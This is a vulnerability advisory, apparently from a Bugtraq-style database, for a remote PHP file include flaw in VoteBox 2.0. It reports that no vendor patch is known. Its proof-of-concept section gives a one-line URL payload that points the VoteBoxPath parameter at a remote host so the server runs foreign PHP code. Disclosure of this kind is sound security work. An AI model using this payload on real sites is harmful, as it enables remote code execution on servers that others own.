VoteBox Votebox.PHP Remote File Include Vulnerability
BID:12806
Info
VoteBox Votebox.PHP Remote File Include Vulnerability
| Bugtraq ID: | 12806 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 14 2005 12:00AM |
| Updated: | Mar 14 2005 12:00AM |
| Credit: | Discovery of this vulnerability is credited to SmOk3 <[email protected]>. |
| Vulnerable: |
Hensel Hartmann VoteBox 2.0 |
| Not Vulnerable: | |
Discussion
VoteBox Votebox.PHP Remote File Include Vulnerability
It is reported that VoteBox is affected by a remote PHP file include vulnerability. This issue is due in part to the application failing to properly sanitize user-supplied input to the 'votebox.php' script.
Remote attackers could potentially exploit this issue to include and execute a remote malicious PHP script.
This issue reportedly affects VoteBox version 2.0, previous versions might also be affected.
It is reported that VoteBox is affected by a remote PHP file include vulnerability. This issue is due in part to the application failing to properly sanitize user-supplied input to the 'votebox.php' script.
Remote attackers could potentially exploit this issue to include and execute a remote malicious PHP script.
This issue reportedly affects VoteBox version 2.0, previous versions might also be affected.
Exploit / POC
VoteBox Votebox.PHP Remote File Include Vulnerability
The following example is available:
www.example.com/votebox.php?VoteBoxPath=http://[CMD]
The following example is available:
www.example.com/votebox.php?VoteBoxPath=http://[CMD]
Solution / Fix
VoteBox Votebox.PHP Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
VoteBox Votebox.PHP Remote File Include Vulnerability
References:
References:
- VoteBox Homepage (Hensel Hartmann)
- VoteBox Remote File Include (SmOk3
)